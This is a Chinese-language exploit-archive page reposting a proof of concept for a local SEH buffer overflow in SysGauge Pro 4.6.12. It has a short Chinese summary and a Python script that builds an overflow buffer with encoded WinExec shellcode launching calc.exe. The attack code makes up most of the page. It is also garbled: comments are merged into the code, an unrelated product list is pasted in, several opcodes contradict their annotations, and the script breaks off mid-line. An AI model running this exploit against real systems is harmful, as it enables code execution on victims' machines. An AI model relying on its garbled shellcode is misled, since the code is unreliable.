SysGauge Pro 4.6.12 本地缓冲区溢出漏洞 (SEH) POC

SysGauge Pro 4.6.12 - 本地缓冲区溢出 (SEH) 漏洞概述 漏洞类型：本地缓冲区溢出 (Local Buffer Overflow) 受影响软件：SysGauge Pro v4.6.12 漏洞描述：在“客户名称”字段的“注册”类型中输入“FakeLabel”时，解锁密钥字段存在缓冲区溢出漏洞。攻击者可以通过构造恶意数据覆盖 SEH (结构化异常处理) 并执行任意代码。 利用方式：将生成的 payload 内容复制到“解锁密钥”字段并点击注册。 影响范围 平台：Windows 测试环境：Windows XP Professional - SP3 发布日期：2018-04-16 修复方案 页面未提供具体的补丁或修复方案，建议联系厂商更新软件或升级至安全版本。 POC/利用代码 ```python #!/usr/bin/python ##############################################################################################Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) Exploit Author : Hashim Jawad Twitter : @hackfalafel Author Website : hackfalafel.com Vendor Homepage : http://www.sysgauge.com/ Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe Tested on : Windows XP Professional - SP3 Steps to reproduce : - Copy content of payload.txt : - Under Register type in 'FakeLabel' in Customer Name field : - Paste the content of payload.txt in Unlock Key field and click Register ##############################################################################################import struct SyncBreeze Ultimate v10.7.14 DiskPulse Pro v10.7.14 DiskPulse Ultimate v10.7.14 DiskSavvy Pro v10.7.14 DiskSavvy Ultimate v10.7.14 DiskSarter Pro v10.7.14 DiskKorter Ultimate v10.7.14 DupScout Pro v10.7.14 DupScout Ultimate v10.7.14 VA Search Pro v10.7.14 VA Search Ultimate v10.7.14 ##############################################################################################overwrite SEH with clean address of [pop, pop, ret] buffer = "\x41" 700 junk to nSEH buffer += "\x74\x86\x04\x04" nSEH - jump if zero flag is set (always true) buffer += struct.pack('<i', 0x00103d16) SEH (pop esi pop ecx retin buffer += "\x43" 28 more junk push calc.exe instructions [encoded] into the stack Disassembly: 0: 33 c0 xor eax,eax zero out eax register 2: 50 push eax push eax (null-byte) to terminate "calc.exe" 3: 68 2E 05 78 05 push "exe" push the ASCII string to the stack 8: 68 63 61 6c 63 push "calc" d: bb c4 mov eax,esp put the pointer to the ASCII string in eax f: 6a 81 push 0x81 push uCmdShow parameter to the stack 11: 50 push eax push the pointer to lpCmdLine to the stack 12: bb 5d 2b 08 7c mov ebx,0x7c082b5d move the pointer to WinExec() [located at 0x7c082b5d in kernel32.dll (via advapi.exe) on W32P SP3] into ebx 17: ff d3 call ebx call WinExec() divide calc.exe instructions to 4-byte chunks and pad what's left with nops "\x33\xc0\x50\x68" "\x74\x86\x04\x04" "\x68\x63\x61\x6c\x63" "\xbb\xc4" "\x6a\x81" "\x50" "\x5d\x2b\x08\x7c" "\xff\xd3" starting from the bottom up in little endian order first push "\x5d\x2b\x08\x7c" buffer += "\x33\xc0\x50\x68" buffer += "\x74\x86\x04\x04" buffer += "\x68\x63\x61\x6c\x63" buffer += "\xbb\xc4" buffer += "\x6a\x81" buffer += "\x50" buffer += "\x5d\x2b\x08\x7c" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\x68\x63\x61\x6c\x63" into eax and push it to the stack buffer += "\x85\x72\x70\x78\x78" add eax, 0x78707872 buffer += "\x85\x01\x20\x20\x20" add eax, 0x20202001 buffer += "\x50" push eax second push "\xff\xd3\x7c\x08" buffer += "\xff\xd3\x7c\x08" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\xff\xd3\x7c\x08" into eax and push it to the stack buffer += "\x85\x01\x32\x35\x60" add eax, 0x65353101 buffer += "\x85\x15\x32\x35\x60" add eax, 0x65353215 buffer += "\x85\x15\x22\x12\x33" add eax, 0x33221515 buffer += "\x50" push eax third push "\x5d\x2b\x08\x7c" buffer += "\x5d\x2b\x08\x7c" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\x5d\x2b\x08\x7c" into eax and push it to the stack buffer += "\x85\x01\x30\x65\x50" add eax, 0x65300101 buffer += "\x85\x01\x20\x50\x27" add eax, 0x27502001 buffer += "\x40" dec eax buffer += "\x50" push eax fourth push "\x6a\x81\xbb\xc4" buffer += "\x6a\x81\xbb\xc4" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\x6a\x81\xbb\xc4" into eax and push it to the stack buffer += "\x85\x32\x40\x35\x35" add eax, 0x35403532 buffer += "\x85\x31\x43\x78\x33" add eax, 0x37843315 buffer += "\x50" push eax fifth push "\x68\x63\x61\x6c" buffer += "\x68\x63\x61\x6c" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\x68\x63\x61\x6c" into eax and push it to the stack buffer += "\x85\x34\x32\x31\x34" add eax, 0x34313234 buffer += "\x85\x34\x31\x30\x30" add eax, 0x30313434 buffer += "\x50" push eax sixth push "\x68\x74\x86\x04" buffer += "\x68\x74\x86\x04" zero out eax buffer += "\x25\x10\x10\x10\x10" and eax, 0x10101010 buffer += "\x25\x01\x01\x01\x01" and eax, 0x01010101 move "\x68\x74\x86\x04" into eax and push it to the stack buffer += "\x85\x17\x33\x34\x31" add eax, 0x34331715 buffer += "\x85\x17\x32\x44\x32" add eax,

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

SysGauge Pro 4.6.12 本地缓冲区溢出漏洞 (SEH) POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

SysGauge Pro 4.6.12 本地缓冲区溢出漏洞 (SEH) POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！